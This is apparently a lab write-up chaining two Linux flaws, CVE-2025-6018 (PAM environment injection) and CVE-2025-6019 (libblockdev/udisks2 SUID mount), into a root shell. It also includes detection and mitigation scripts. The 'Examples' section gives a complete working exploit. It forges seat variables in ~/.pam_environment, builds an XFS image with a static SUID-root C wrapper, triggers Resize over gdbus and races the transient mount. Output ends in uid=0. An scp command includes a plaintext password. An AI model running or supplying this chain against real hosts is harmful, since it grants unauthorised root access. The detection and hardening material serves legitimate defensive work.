This article covers two Linux privilege escalation vulnerabilities, CVE-2025-6018 and CVE-2025-6019, and how they chain into a root shell. CVE-2025-6018 is a PAM environment-variable injection that lets a remote (SSH) user pass as a local, active user; it requires a systemd-logind target whose pam_env module is configured with user_readenv=1 (as shipped on SUSE). CVE-2025-6019 is a local privilege escalation in libblockdev, reached through udisks2, which mounts an attacker-supplied XFS image without nosuid during a filesystem resize. The article lays out the prerequisites, root causes, exploitation steps, and detection and remediation for both, for penetration testers who need to identify and close these risks.

Prerequisites

1. Prerequisites for Identity Spoofing (for CVE-2025-6018)

This is the first leg of the "relay race", aiming to make the system recognize you as a "local" instead of an "outsider".

  • Must be a systemd system: the target must use systemd-logind (the systemd login manager) to manage sessions, with pam_systemd.so registering each login as a session.
  • Environment-reading PAM configuration: pam_env.so must be configured with user_readenv=1 so that it reads ~/.pam_environment at login. This is the actual misconfiguration behind CVE-2025-6018; upstream Linux-PAM has defaulted the option to 0 since 1.5.0.
  • Writable home directory: you must be able to create or modify ~/.pam_environment.
  • A fresh session: you must be able to open a new login session (reconnect over SSH, or run su - username) so that pam_env reads the poisoned file and pam_systemd registers the session with the forged seat and VT.

2. Prerequisites for Authorization (Polkit's Trust)

This is the "bridge" connecting the two vulnerabilities. Without this step, you cannot invoke subsequent disk management functions.

  • Active status: the session's Active property, as shown by loginctl, must be yes.
  • Seat binding: the session must be attached to a seat, normally seat0 (the primary hardware seat). A plain SSH session has no seat and is never active; that is exactly what the forged XDG_SEAT and XDG_VTNR change.
  • Polkit policy: the polkit action that gates the udisks2 call (org.freedesktop.udisks2.modify-device for Filesystem.Resize) must grant allow_active users access without an administrator password. That is the default policy shipped with udisks2, so on most systems this step costs nothing once the session looks local.

3. Prerequisites for Vulnerability Triggering (for CVE-2025-6019)

This is the finish line of the "relay race", truly completing the leap from an ordinary user to Root (superuser).

  • Vulnerable library: the installed libblockdev (the block-device manipulation library that udisks2 is built on) must be unpatched; the fix shipped in libblockdev 3.3.1.
  • Kernel support for XFS: the kernel must have the XFS driver available, or the malicious image cannot be mounted at all.
  • udisks2 running: the udisks2 daemon must be running, and polkit must let you call its Filesystem.Resize method over D-Bus.
  • Writable /tmp: libblockdev creates its temporary mount point under /tmp (a directory named blockdev.XXXXXX). A noexec flag on /tmp does not matter: the image is mounted on top of that directory as its own mount, and mount flags are not inherited from the parent filesystem.
  • Prepared image: you need a pre-built XFS image containing a root-owned binary with the SUID bit set.

Vulnerability Overview

1. Vulnerability Overview

  • CVE-2025-6018:
    • Name: PAM Environment Variable Injection Vulnerability
    • Type: Logical Flaw / Identity Spoofing
    • Scope of Impact: Primarily affects SUSE series and misconfigured Linux distributions.
  • CVE-2025-6019:
    • Name: libblockdev / udisks2 Logical Vulnerability
    • Type: Local Privilege Escalation (LPE)
    • Risk Level: High

2. Root Cause Analysis

  • CVE-2025-6018 (the foothold): pam_env.so is configured with user_readenv=1, so at login it reads ~/.pam_environment and exports whatever the user put there into the session's PAM environment.
    • Key variables: XDG_SEAT and XDG_VTNR (the XDG prefix comes from the X Desktop Group, freedesktop.org's former name). pam_systemd.so takes the seat and virtual terminal of a new session from these variables when they are present in the PAM environment.
    • Consequence: systemd-logind records the SSH session as attached to seat0 on VT 1 and marks it active, and polkit, which consults logind to classify the caller, treats it as an "active local session" and applies allow_active rules that a remote session should never match.
  • CVE-2025-6019 (the escalation): when udisks2 handles a Filesystem.Resize request for XFS it hands the work to libblockdev, which has to mount the filesystem to run xfs_growfs and therefore mounts the block device on a temporary directory under /tmp.
    • Flaw: that temporary mount is made without MS_NOSUID (and without MS_NODEV).
    • Consequence: a SUID-root binary inside an attacker-supplied image is honoured by the kernel for as long as the image is mounted, which is enough to get a root shell.

3. Exploitation Chain Construction

This section is the essence of the notes, detailing how to chain the two together:

  1. Environment preparation: create .pam_environment in $HOME with forged local seat information (XDG_SEAT=seat0, XDG_VTNR=1).
  2. Session reset: open a new login session (reconnect over SSH) so that PAM reads the file and logind registers the session with the forged seat.
  3. Permission verification: confirm with loginctl that the new session shows seat0 and Active=yes, and with pkcheck that polkit grants the udisks2 action without a password.
  4. Payload deployment: build an XFS disk image containing a root-owned SUID shell and copy it to the target.
  5. Trigger execution: attach the image with udisksctl loop-setup, then call org.freedesktop.UDisks2.Filesystem.Resize over D-Bus (udisksctl has no resize command, so use gdbus). libblockdev mounts the image under /tmp without nosuid for as long as xfs_growfs runs; executing the SUID program from that mount point inside that window gives root.

4. Penetration Test Checklist

  1. Check whether any pam_env.so line under /etc/pam.d/ carries user_readenv=1 (grep -r user_readenv /etc/pam.d). If none does, ~/.pam_environment is ignored and the chain stops here.
  2. Check that you can write ~/.pam_environment and that, after a fresh login, the forged variables show up in env.
  3. Check whether pkcheck or udisksctl is available, and whether loginctl shows your session as seat0/active.
  4. Check the installed libblockdev version against the fixed release (3.3.1).
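The checklist reduces to two tests that need no root. The helper below is an added example, not tooling from the original notes: it greps a pam.d directory for an uncommented pam_env.so line enabling user_readenv=1, and parses a /proc/self/mountinfo snapshot for mounts under a prefix (libblockdev's /tmp/blockdev.) whose per-mount options lack nosuid. The sample pam.d files and mountinfo lines it ships with are constructed, not captured from a real host; run it with the argument live to point it at /etc/pam.d and the current mount table.

```shell
#!/bin/sh
# Pre-check helpers for the two checklist conditions. Added example; the
# "demo" inputs below are constructed, not captured from a real host.

# Print every uncommented pam_env.so line under DIR that sets user_readenv=1.
# Exit 0 if at least one exists (CVE-2025-6018 precondition), 1 otherwise.
pam_user_readenv_enabled() {
    pam_dir="$1"
    hits=$(grep -rsHnE '^[^#]*pam_env\.so.*user_readenv=1([[:space:]]|$)' "$pam_dir") || true
    [ -n "$hits" ] || return 1
    printf '%s\n' "$hits"
}

# Print every mount point in a mountinfo-format FILE that starts with PREFIX
# and whose per-mount options (field 6) do not contain nosuid. Field 5 is the
# mount point. A patched libblockdev adds nosuid,nodev to its temporary
# /tmp/blockdev.XXXXXX mount; an unpatched one leaves them off.
mounts_missing_nosuid() {
    awk -v p="$2" 'index($5, p) == 1 && $6 !~ /(^|,)nosuid(,|$)/ { print $5 }' "$1"
}

# Constructed sample inputs: a pam.d tree with one live, one commented and one
# option-less pam_env line, plus a mountinfo snapshot in which a noexec /tmp
# holds one unpatched-style loop mount (no nosuid) and one hardened one.
write_samples() {
    d=$(mktemp -d)
    mkdir "$d/pam.d"
    printf 'session optional pam_env.so readenv=1 user_readenv=1\n' > "$d/pam.d/common-session"
    printf '# session optional pam_env.so user_readenv=1\n' > "$d/pam.d/common-session-pc"
    printf 'session optional pam_env.so\n' > "$d/pam.d/login"
    cat > "$d/mountinfo" <<'EOF'
25 0 8:1 / / rw,relatime shared:1 - ext4 /dev/sda1 rw
40 25 0:35 / /tmp rw,nosuid,nodev,noexec,relatime shared:20 - tmpfs tmpfs rw
41 40 7:0 / /tmp/blockdev.38YCK3 rw,relatime shared:30 - xfs /dev/loop0 rw,attr2
42 40 7:1 / /tmp/blockdev.Ab12Cd rw,nosuid,nodev,relatime shared:31 - xfs /dev/loop1 rw,attr2
EOF
    printf '%s\n' "$d"
}

# Run both checks against PAMDIR and MOUNTINFO and print one verdict line each.
precheck() {
    pamdir="$1"
    minfo="$2"
    if pam_user_readenv_enabled "$pamdir"; then
        echo "[!] pam_env reads ~/.pam_environment (user_readenv=1): CVE-2025-6018 precondition present"
    else
        echo "[ ] no active user_readenv=1 under $pamdir"
    fi
    missing=$(mounts_missing_nosuid "$minfo" /tmp/blockdev.)
    if [ -n "$missing" ]; then
        echo "[!] temporary libblockdev mount(s) without nosuid: $missing"
    else
        echo "[ ] no /tmp/blockdev.* mount lacking nosuid (none present, or libblockdev is patched)"
    fi
}

case "${1:-demo}" in
    live) precheck /etc/pam.d /proc/self/mountinfo ;;
    demo) s=$(write_samples); precheck "$s/pam.d" "$s/mountinfo"; rm -rf "$s" ;;
esac
```

On a live host the mountinfo test is only meaningful while a resize is in flight, because libblockdev unmounts the directory as soon as xfs_growfs returns: run the script with live in a tight loop while triggering Filesystem.Resize on a benign XFS image of your own, and treat any /tmp/blockdev.* mount that shows up without nosuid as proof that the installed libblockdev is unpatched.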

5. Mitigation and Defense

  • Short-term: set user_readenv=0 on every pam_env.so line (or drop the option; upstream Linux-PAM defaults it to 0), and tighten polkit so that org.freedesktop.udisks2.modify-device requires auth_admin instead of allow_active=yes. Either change alone breaks the chain.
  • Long-term: update libblockdev (3.3.1 or later) and udisks2 from the distribution. The kernel is not involved in either bug.
  • Audit: alert on changes to ~/.pam_environment, on logind sessions that sit on seat0 while their TTY is a pseudo-terminal (pts/N, as in the loginctl output below), and on udisks2 Filesystem.Resize calls originating from SSH sessions.
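As an added example (not part of the original notes), the script below applies the two short-term mitigations in a form that can be reviewed before it touches a host: it rewrites user_readenv=1 to user_readenv=0 on uncommented pam_env.so lines in a pam.d directory, keeping a .bak copy of each file changed, and renders a polkit rules file that moves org.freedesktop.udisks2.modify-device to auth_admin for everyone outside an administrator group. The pam.d tree used by the demo is constructed; the group name wheel and the rules file name 49-udisks2-modify-device.rules are assumptions to adapt to the distribution.

```shell
#!/bin/sh
# Mitigation helpers for CVE-2025-6018 / CVE-2025-6019. Added example; the demo
# pam.d tree is constructed. Run as root with "apply" to change a real host.

# Rewrite user_readenv=1 to user_readenv=0 on every uncommented pam_env.so line
# under DIR, leaving a .bak copy of each file touched. Prints the files changed.
disable_user_readenv() {
    for f in $(grep -rlsE '^[^#]*pam_env\.so.*user_readenv=1' "$1"); do
        sed -E -i.bak '/^[^#]*pam_env\.so/{s/user_readenv=1([[:space:]])/user_readenv=0\1/g;s/user_readenv=1$/user_readenv=0/;}' "$f"
        echo "$f"
    done
}

# Render a polkit rules file that makes the action gating Filesystem.Resize ask
# for administrator authentication unless the caller is in GROUP. The group
# name (default wheel) and the target file name are assumptions.
render_udisks_rule() {
    group="${1:-wheel}"
    cat <<EOF
// Require admin authentication for udisks2 device modification (CVE-2025-6019 mitigation)
polkit.addRule(function(action, subject) {
    if (action.id == "org.freedesktop.udisks2.modify-device" &&
        !subject.isInGroup("$group")) {
        return polkit.Result.AUTH_ADMIN;
    }
});
EOF
}

# Run from an unprivileged login after applying the rule: pkcheck must now fail
# instead of silently granting the action to an "active" session.
verify_polkit() {
    if pkcheck --action-id org.freedesktop.udisks2.modify-device --process $$ >/dev/null 2>&1; then
        echo "[!] modify-device is still granted to this session without a password"
        return 1
    fi
    echo "[+] modify-device now requires administrator authentication"
}

# Constructed pam.d tree: one live misconfigured line, one commented-out line.
demo_pamdir() {
    d=$(mktemp -d)
    printf 'session optional pam_env.so readenv=1 user_readenv=1\n' > "$d/common-session"
    printf '# session optional pam_env.so user_readenv=1\n' > "$d/common-session-pc"
    printf '%s\n' "$d"
}

case "${1:-demo}" in
    apply)
        disable_user_readenv /etc/pam.d
        render_udisks_rule wheel > /etc/polkit-1/rules.d/49-udisks2-modify-device.rules
        ;;
    demo)
        d=$(demo_pamdir)
        disable_user_readenv "$d"   # prints the one file it rewrote
        cat "$d/common-session"     # now ends in user_readenv=0
        render_udisks_rule wheel
        rm -rf "$d"
        ;;
esac
```

polkitd watches rules.d and picks the new file up without a restart; the PAM change takes effect for the next login. Existing sessions that were already registered with a forged seat keep their logind state until they end, so terminate them after applying the fix.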

Examples

Exploiting CVE-2025-6018

phileasfogg3@pterodactyl:~> cat .pam_environment

XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1

Re-login via SSH

phileasfogg3@pterodactyl:~> env | grep XDG
XDG_VTNR=1
XDG_SESSION_ID=184
XDG_SESSION_TYPE=tty
XDG_DATA_DIRS=/usr/share
XDG_SESSION_CLASS=user
XDG_SEAT=seat0
XDG_RUNTIME_DIR=/run/user/1002
XDG_CONFIG_DIRS=/etc/xdg

Check if SEAT is seat0 and STATE is active

phileasfogg3@pterodactyl:~> loginctl --no-pager
SESSION  UID USER         SEAT  TTY   STATE  IDLE SINCE
     20 1002 phileasfogg3 seat0 pts/0 active no

1 sessions listed.

Confirm the polkit authorization

phileasfogg3@pterodactyl:~> pkcheck --action-id org.freedesktop.udisks2.filesystem-mount --process $$ && echo "VULNERABLE: Polkit is bypassed!"

VULNERABLE: Polkit is bypassed!

If pkcheck returns without prompting for a password and prints VULNERABLE, polkit now treats the SSH session as a local active user. The action that actually gates Filesystem.Resize is org.freedesktop.udisks2.modify-device, so the precise check is the same command with --action-id org.freedesktop.udisks2.modify-device; if that passes too, you hold the ticket for CVE-2025-6019.


Exploiting CVE-2025-6019

Step 1: Create a malicious XFS image on the attacking machine

# 1. Create a 300MB empty image file
dd if=/dev/zero of=xfs.image bs=1M count=300

# 2. Format as XFS (Extents File System)
mkfs.xfs xfs.image

# 3. Mount the image and implant the SUID Shell wrapper
mkdir -p ./mnt
sudo mount -o loop xfs.image ./mnt

# 4. Write and compile a small SUID wrapper (more reliable than copying bash).
#    Link it statically so it does not depend on the target's glibc version.
cat << 'EOF' > rootshell.c
#include <unistd.h>
#include <stdlib.h>
int main(void) {
    setgid(0);
    setuid(0);
    system("/bin/bash -p");
    return 0;
}
EOF
gcc -static rootshell.c -o rootshell

# 5. Copy it into the root-owned mount and set the SUID bit (the owner must be root)
sudo cp rootshell ./mnt/rootshell
sudo chmod 4755 ./mnt/rootshell

# 6. Unmount the image and clean up
sudo umount ./mnt
rm rootshell.c rootshell

The mount, copy and chmod steps need sudo. Upload the image to the target: sshpass -p '!QAZ2wsx' scp xfs.image phileasfogg3@pterodactyl.htb:/tmp/

Step 2: Trigger privilege escalation on the target machine

# 1. Enter the /tmp directory
cd /tmp

# 2. Set up the loop device
# udisksctl: User-space Disk Control Tool
LOOP_DEV=$(udisksctl loop-setup --file /tmp/xfs.image --no-user-interaction | grep -o '/dev/loop[0-9]*')
echo "Loop Device: $LOOP_DEV"

# 3. Trigger the vulnerability: Use gdbus to call the Resize method
# This forces libblockdev (Block Device Manipulation Library) to mount the image in a vulnerable way
gdbus call --system --dest org.freedesktop.UDisks2 \
    --object-path "/org/freedesktop/UDisks2/block_devices/${LOOP_DEV##*/}" \
    --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'

# 4. Find the mount point and run the privilege escalation program.
#    libblockdev mounts the image on a directory named /tmp/blockdev.XXXXXX
#    (note the dot, as in the output further down) and unmounts it again once
#    xfs_growfs finishes, so this single-shot check only works if the mount is
#    still there when gdbus returns; otherwise use the loop in step 3.
MOUNT_PATH=$(find /tmp -maxdepth 1 -name "blockdev.*" -type d 2>/dev/null | head -n 1)
if [ -z "$MOUNT_PATH" ]; then
    echo "[-] No mount found: the window may have closed, or the session is not Active."
else
    echo "[+] Found mount at: $MOUNT_PATH"
    "$MOUNT_PATH/rootshell"
fi

Step 3: Start the snatching loop

# 1. Start a tight background poller for the transient mount
(while true; do
    target=$(find /tmp -maxdepth 1 -name "blockdev.*" -type d 2>/dev/null | head -n 1)
    if [ -n "$target" ]; then
        echo "[!] MOUNT DETECTED: $target"
        # An interactive shell started from a background job is stopped
        # (SIGTTIN) when it touches the terminal; bring it forward with fg.
        "$target/rootshell"
        break
    fi
done) &

# 2. Get the snatcher's process ID
SNATCHER_PID=$!

# 3. Re-setup the loop device (assuming you uploaded the image)
LOOP_DEV=$(udisksctl loop-setup --file /tmp/xfs.image --no-user-interaction | grep -o '/dev/loop[0-9]*')

# 4. Trigger the vulnerability (multiple triggers increase success rate)
for i in {1..3}; do
    gdbus call --system --dest org.freedesktop.UDisks2 \
        --object-path "/org/freedesktop/UDisks2/block_devices/${LOOP_DEV##*/}" \
        --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'
done

# 5. If successful, you will get a Root Shell; if not, kill the snatcher
kill $SNATCHER_PID 2>/dev/null

Finally

phileasfogg3@pterodactyl:/tmp> find /tmp/blockdev.* -name "rootshell" -perm -4000 2>/dev/null
/tmp/blockdev.38YCK3/rootshell
phileasfogg3@pterodactyl:/tmp> /tmp/blockdev.38YCK3/rootshell -p
pterodactyl:/tmp # id
uid=0(root) gid=0(root) groups=0(root),100(users)
pterodactyl:/tmp # cat /root/root.txt

Detection

#!/bin/bash

# --- Color Definitions ---
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
NC='\033[0m' # No Color

echo -e "${BLUE}====================================================${NC}"
echo -e "${BLUE}       NeobeeSec Privilege Escalation Pre-check Scanner             ${NC}"
echo -e "${BLUE}====================================================${NC}"

# 1. System Basic Information Collection
echo -e "\n${YELLOW}[1] System Information${NC}"
echo -e "Hostname: $(hostname)"
echo -e "Kernel Version: $(uname -r)"
if [ -f /etc/os-release ]; then
    # os-release is shell-sourceable; PRETTY_NAME carries the distribution string
    source /etc/os-release
    echo -e "Distribution: $PRETTY_NAME"
fi

# 2. CVE-2025-6018 Status Check (Identity Spoofing Check)
echo -e "\n${YELLOW}[2] CVE-2025-6018 Identity Spoofing Status (Environment Poisoning)${NC}"

# Check the PAM configuration first: without user_readenv=1 on pam_env.so the
# ~/.pam_environment file is never read and the chain cannot start
echo -n "pam_env user_readenv=1: "
if grep -rsE '^[^#]*pam_env\.so.*user_readenv=1' /etc/pam.d/ >/dev/null; then
    echo -e "${GREEN}present (~/.pam_environment is honoured)${NC}"
else
    echo -e "${RED}absent (pam_env ignores ~/.pam_environment)${NC}"
fi

# Check environment variables (XDG: X Desktop Group, freedesktop.org's old name)
echo -n "XDG_SEAT Status: "
if [[ "$XDG_SEAT" == "seat0" ]]; then
    echo -e "${GREEN}Set to seat0 (meets attack conditions)${NC}"
else
    echo -e "${RED}Not set or not seat0 (current value: ${XDG_SEAT:-unset})${NC}"
fi

# Check session activity with loginctl ("self" resolves to the caller's own session)
if command -v loginctl &>/dev/null; then
    ACTIVE_STATUS=$(loginctl show-session "${XDG_SESSION_ID:-self}" --property=Active --value 2>/dev/null)
    echo -e "Session Active Status: ${ACTIVE_STATUS:-Unknown}"
    if [[ "$ACTIVE_STATUS" == "yes" ]]; then
        echo -e "[${GREEN}√${NC}] Session is active, Polkit [PolicyKit] will trust this session."
    else
        echo -e "[${RED}!${NC}] Session is inactive, may not be able to call privileged D-Bus [Desktop Bus] methods."
    fi
else
    echo -e "${RED}[x] loginctl tool not found${NC}"
fi

# 3. Core Libraries and Components Check
echo -e "\n${YELLOW}[3] Key Components and Package Versions (Software Packages)${NC}"

# Check if tools exist
components=("udisksctl" "gdbus" "pkcheck")
for cmd in "${components[@]}"; do
    if command -v "$cmd" &>/dev/null; then
        echo -e "[${GREEN}√${NC}] Tool found: $cmd"
    else
        echo -e "[${RED}x${NC}] Missing tool: $cmd"
    fi
done

# Deep check package versions (supports RPM and DPKG)
# Full name: Red Hat Package Manager
# Full name: Debian Package
check_pkgs=("libblockdev" "udisks2" "polkit" "systemd")

if command -v rpm &>/dev/null; then
    echo -e "\n--- RPM-based package version query ---"
    for pkg in "${check_pkgs[@]}"; do
        rpm -qa | grep -i "$pkg" | sed "s/^/[+] /"
    done
elif command -v dpkg &>/dev/null; then
    echo -e "\n--- DPKG-based package version query ---"
    for pkg in "${check_pkgs[@]}"; do
        dpkg -l | grep -i "$pkg" | awk '{print "[+] "$2, $3}'
    done
fi

# 4. CVE-2025-6019 Privilege Escalation Pre-check (Disk and Mount)
echo -e "\n${YELLOW}[4] CVE-2025-6019 Privilege Escalation Pre-check (LPE Prerequisites)${NC}"

# Check kernel support for XFS
# Full name: Extents File System
if grep -q "xfs" /proc/filesystems; then
    echo -e "[${GREEN}√${NC}] Kernel supports XFS filesystem."
else
    echo -e "[${RED}x${NC}] Kernel does not support XFS, cannot mount escalation image.${NC}"
fi

# Report the /tmp mount flags for completeness. noexec on /tmp does not block
# the attack: the image becomes its own mount under /tmp/blockdev.XXXXXX and
# does not inherit the parent's flags. What matters is whether libblockdev adds
# nosuid to that temporary mount, which only a patched version does.
if mount | grep -E '\s/tmp\s' | grep -q "noexec"; then
    echo -e "[${YELLOW}i${NC}] /tmp is mounted noexec (irrelevant to the loop mount; only affects helpers dropped directly in /tmp)."
else
    echo -e "[${GREEN}√${NC}] /tmp allows program execution."
fi

# 5. Polkit authorization check
echo -e "\n${YELLOW}[5] Polkit [PolicyKit] Authorization Test${NC}"
# pkcheck exits 0 when the action is granted to this process without a prompt.
# modify-device is the action that gates Filesystem.Resize; filesystem-mount is
# checked as well because it ships with the same allow_active=yes default.
if command -v pkcheck &>/dev/null; then
    for action in org.freedesktop.udisks2.modify-device org.freedesktop.udisks2.filesystem-mount; do
        if pkcheck --action-id "$action" --process $$ &>/dev/null; then
            echo -e "[${GREEN}√${NC}] $action granted without a password"
        else
            echo -e "[${RED}x${NC}] $action requires administrator authentication"
        fi
    done
fi

echo -e "\n${BLUE}====================================================${NC}"
echo -e "Scan complete. If many items marked with [√] above, the privilege escalation success rate is extremely high."